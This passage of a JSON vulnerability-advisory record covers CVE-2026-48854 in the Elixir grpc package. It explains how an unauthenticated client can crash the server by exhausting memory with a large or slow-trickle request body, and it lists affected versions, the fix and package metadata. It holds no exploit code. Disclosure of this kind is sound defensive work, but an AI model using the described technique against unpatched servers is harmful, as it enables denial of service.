body accumulation causes memory exhaustion in elixir-grpc/grpc","description":"## Summary\n\nAllocation of Resources Without Limits or Throttling vulnerability in elixir-grpc grpc allows unauthenticated attackers to exhaust the BEAM's memory and crash the server by streaming a large or slow-trickle unary request body.\n\n`'Elixir.GRPC.Server.Adapters.Cowboy.Handler':read_full_body/3` (`lib/grpc/server/adapters/cowboy/handler.ex`) accumulates every received chunk into a single growing binary with no size cap. Additionally, when the client omits the `grpc-timeout` header, the per-chunk read timeout resolves to `:infinity`, allowing a slow-trickle client to keep the connection alive indefinitely while memory grows. A single connection is sufficient to exhaust server memory and crash the node.\n\nThis issue affects grpc: from 0.3.0-alpha.2 before 1.0.0.","origin":"ERLEF","severity":"HIGH","published_at":"2026-06-15T21:55:23.629Z","withdrawn_at":null,"classification":null,"cvss_score":8.7,"cvss_vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N","references":["https://github.com/elixir-grpc/grpc/security/advisories/GHSA-q8gf-9rvj-gmgj","https://cna.erlef.org/cves/CVE-2026-48854.html","https://github.com/elixir-grpc/grpc/commit/d1abe70a6cad6dac4a3f8235d883d7c896989560","https://github.com/elixir-grpc/grpc/commit/49e18c3ec6bb9afe2f712caad3dbab5c56a68a00","https://hex.pm/packages/grpc"],"source_kind":"erlef","identifiers":["EEF-CVE-2026-48854","GHSA-q8gf-9rvj-gmgj","CVE-2026-48854"],"repository_url":"https://github.com/elixir-grpc/grpc","blast_radius":16.74122978873837,"created_at":"2026-06-15T22:18:57.497Z","updated_at":"2026-09-24T21:09:30.951Z","epss_percentage":null,"epss_percentile":null,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/EEF-CVE-2026-48854","html_url":"https://advisories.ecosyste.ms/advisories/EEF-CVE-2026-48854","packages":[{"ecosystem":"hex","package_name":"grpc","versions":[{"first_patched_version":"1.0.0","vulnerable_version_range":"\u003e= 0.3.0-alpha.2, \u003c 1.0.0"}],"purl":null,"statistics":{"dependent_packages_count":47,"dependent_repos_count":84,"downloads":7145362,"downloads_period":"total"},"affected_versions":["0.3.0-alpha.2","0.3.1","0.4.0-alpha.1","0.4.0-alpha.2","0.5.0","0.5.0-beta","0.5.0-beta.1","0.6.0","0.7.0","0.8.0","0.8.1","0.9.0","0.10.0","0.10.1","0.10.2","0.11.0","0.11.1","0.11.2","0.11.3","0.11.4","0.11.5","1.0.0-rc.1"],"unaffected_versions":["1.0.0","1.0.1","1.0.2","1.0.3","1.0.4","1.0.5"]}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/EEF-CVE-2026-48854/related_packages","related_advisories":[{"uuid":"GSA_kwCzR0hTQS1xOGdmLTlydmotZ21nas4ABlWY","source_kind":"github","url":"https://github.com/advisories/GHSA-q8gf-9rvj-gmgj"}]}],"docker_usage_url":"https://docker.ecosyste.ms/usage/hex/grpc","docker_dependents_count":1,"docker_downloads_count":87,"usage_url":"https://repos.ecosyste.ms/usage/hex/grpc","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/hex/grpc/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-10-07T02:29:59.783Z","issues_count":113,"pull_requests_count":234,"avg_time_to_close_issue":24598198.753623188,"avg_time_to_close_pull_request":3866623.1725888327,"issues_closed_count":69,"pull_requests_closed_count":197,"pull_request_authors_count":67,"issue_authors_count":75,"avg_comments_per_issue":3.353982300884956,"avg_comments_per_pull_request":1.4102564102564104,"merged_pull_requests_count":162,"bot_issues_count":0,"bot_pull_requests_count":0,"past_year_issues_count":20,"past_year_pull_requests_count":59,"past_year_avg_time_to_close_issue":2613969.7,"past_year_avg_time_to_close_pull_request":554882.7857142857,"past_year_issues_closed_count":10,"past_year_pull_requests_closed_count":42,"past_year_pull_request_authors_count":24,"past_year_issue_authors_count":13,"past_year_avg_comments_per_issue":1.85,"past_year_avg_comments_per_pull_request":2.084745762711864,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":0,"past_year_merged_pull_requests_count":37,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/elixir-grpc%2Fgrpc/issues","maintainers":[{"login":"sleipnir","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sleipnir"},{"login":"tony612","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/tony612"},{"login":"akihisa1210","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/akihisa1210"},{"login":"davydog187","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/davydog187"}],"active_maintainers":[{"login":"sleipnir","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sleipnir"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/hex.pm/packages/grpc/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/hex.pm/packages/grpc/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/hex.pm/packages/grpc/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/hex.pm/packages/grpc/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/hex.pm/packages/grpc/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/hex.pm/packages/grpc/codemeta","maintainers":[{"uuid":"eigr","login":"eigr","name":null,"email":"sleipnir@bsd.com.br","url":null,"packages_count":20,"html_url":"https://hex.pm/users/eigr","role":null,"created_at":"2024-07-19T04:24:30.268Z","updated_at":"2024-07-19T04:24:30.268Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/hex.pm/maintainers/eigr/packages"},{"uuid":"tony612","login":"tony612","name":null,"email":"h.bing612@gmail.com","url":null,"packages_count":8,"html_url":"https://hex.pm/users/tony612","role":null,"created_at":"2022-11-08T12:19:50.907Z","updated_at":"2022-11-08T12:19:50.907Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/hex.pm/maintainers/tony612/packages"},{"uuid":"polvalente","login":"polvalente","name":null,"email":"polvalente@gmail.com","url":null,"packages_count":8,"html_url":"https://hex.pm/users/polvalente","role":null,"created_at":"2023-06-14T23:46:52.917Z","updated_at":"2023-06-14T23:46:52.917Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/hex.pm/maintainers/polvalente/packages"}]}